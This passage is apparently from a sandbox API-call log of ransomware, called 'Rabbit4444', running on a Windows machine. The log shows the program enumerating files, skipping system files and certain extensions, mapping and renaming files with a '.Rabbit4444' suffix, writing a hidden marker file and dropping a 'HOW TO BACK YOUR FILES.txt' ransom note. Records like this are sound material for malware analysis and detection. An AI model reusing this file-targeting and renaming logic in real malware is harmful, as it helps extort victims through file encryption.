returned 1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0064.294] lstrcpyW (in: lpString1=0x130ebec, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0064.294] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0064.295] lstrlenW (lpString="roaming.lock") returned 12 [0064.295] lstrlenW (lpString="Rabbit4444") returned 10 [0064.295] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0064.295] lstrlenW (lpString=".dll") returned 4 [0064.295] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0064.295] lstrlenW (lpString=".lnk") returned 4 [0064.295] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0064.295] lstrlenW (lpString=".ini") returned 4 [0064.295] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0064.295] lstrlenW (lpString=".sys") returned 4 [0064.295] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0064.295] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c54ad1b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc1d6a7f5, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0064.295] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0064.295] lstrcpyW (in: lpString1=0x130ebec, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0064.295] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0064.296] lstrlenW (lpString="settings.dat") returned 12 [0064.296] lstrlenW (lpString="Rabbit4444") returned 10 [0064.296] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0064.296] lstrlenW (lpString=".dll") returned 4 [0064.296] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0064.296] lstrlenW (lpString=".lnk") returned 4 [0064.296] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0064.296] lstrlenW (lpString=".ini") returned 4 [0064.296] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0064.296] lstrlenW (lpString=".sys") returned 4 [0064.296] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0064.296] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.297] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0064.297] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15560734808) returned 1 [0064.297] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0064.297] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0064.297] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0064.297] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0064.298] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0064.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0064.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0064.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0064.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0064.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0064.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0064.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0064.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0064.300] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15561089248) returned 1 [0064.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0064.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0064.300] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.300] CloseHandle (hObject=0x27c) returned 1 [0064.300] CloseHandle (hObject=0x2a0) returned 1 [0064.301] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 113 [0064.301] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0064.301] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x722e55f1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x722e55f1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x722e55f1, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0064.301] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.301] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.301] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0064.301] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0064.301] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0064.301] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0064.301] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0064.301] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0064.301] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0064.301] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0064.302] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0064.302] lstrcpyW (in: lpString1=0x130ebec, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0064.302] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0064.302] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0064.303] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0064.303] lstrlenW (lpString="Rabbit4444") returned 10 [0064.303] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0064.303] lstrlenW (lpString=".dll") returned 4 [0064.303] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0064.303] lstrlenW (lpString=".lnk") returned 4 [0064.303] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0064.303] lstrlenW (lpString=".ini") returned 4 [0064.303] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0064.303] lstrlenW (lpString=".sys") returned 4 [0064.303] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0064.303] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.303] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0064.303] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15561397408) returned 1 [0064.303] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0064.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0064.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0064.303] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0064.306] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0064.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0064.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0064.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0064.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0064.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0064.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0064.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0064.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0064.308] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15561844251) returned 1 [0064.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0064.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0064.308] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.308] CloseHandle (hObject=0x27c) returned 1 [0064.308] CloseHandle (hObject=0x2a0) returned 1 [0064.308] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 118 [0064.308] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0064.309] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x722e55f1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x722e55f1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x722e55f1, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0064.309] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0064.309] lstrcpyW (in: lpString1=0x130ebec, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0064.309] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0064.309] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0064.310] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0064.310] lstrlenW (lpString="Rabbit4444") returned 10 [0064.310] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0064.310] lstrlenW (lpString=".dll") returned 4 [0064.310] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0064.310] lstrlenW (lpString=".lnk") returned 4 [0064.310] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0064.310] lstrlenW (lpString=".ini") returned 4 [0064.310] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0064.310] lstrlenW (lpString=".sys") returned 4 [0064.310] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0064.310] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x722e55f1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x722e55f1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x722e55f1, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0064.310] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0064.310] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.310] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.311] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.311] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.312] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.312] CloseHandle (hObject=0x2a0) returned 1 [0064.312] CloseHandle (hObject=0x2cc) returned 1 [0064.313] GetCurrentThreadId () returned 0xd98 [0064.313] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0064.313] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState" [0064.313] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0064.313] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0064.313] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState" [0064.313] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\" [0064.313] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0064.313] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.314] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.316] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.317] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.318] CloseHandle (hObject=0x2cc) returned 1 [0064.318] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState") returned 93 [0064.318] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.318] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16ea774, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefa7fa8b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0064.318] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.318] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.318] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.318] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.318] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16ea774, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefa7fa8b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.318] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.318] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.319] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.319] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.319] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.319] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefa7fa8b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefa7fa8b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefa7fa8b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.319] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.319] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.319] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefa7fa8b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefa7fa8b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefa7fa8b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.319] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0064.319] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.319] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.319] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.319] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.320] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.320] CloseHandle (hObject=0x2a0) returned 1 [0064.320] CloseHandle (hObject=0x2cc) returned 1 [0064.320] GetCurrentThreadId () returned 0xd98 [0064.320] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0064.320] lstrcpynW (in: lpString1=0x130eb38, 